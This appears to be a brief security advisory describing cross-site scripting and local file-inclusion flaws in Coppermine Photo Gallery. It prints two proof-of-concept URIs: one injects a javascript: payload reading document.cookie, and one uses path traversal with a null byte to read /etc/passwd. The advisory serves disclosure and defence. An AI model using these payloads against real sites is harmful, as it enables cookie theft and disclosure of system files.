|
Coppermine Photo Gallery Multiple Input Validation Vulnerabilities
To exploit the cross-site scripting issue, an attacker must entice an unsuspecting victim into following a malicious URI. An attacker can exploit the local file-include issue through a browser. The following proof-of-concept URIs are available: http://www.example.com/cpg/mode.php?admin_mode=1&referer=javascript:alert(document.cookie) http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/passwd%00 |
|
|
Privacy Statement |
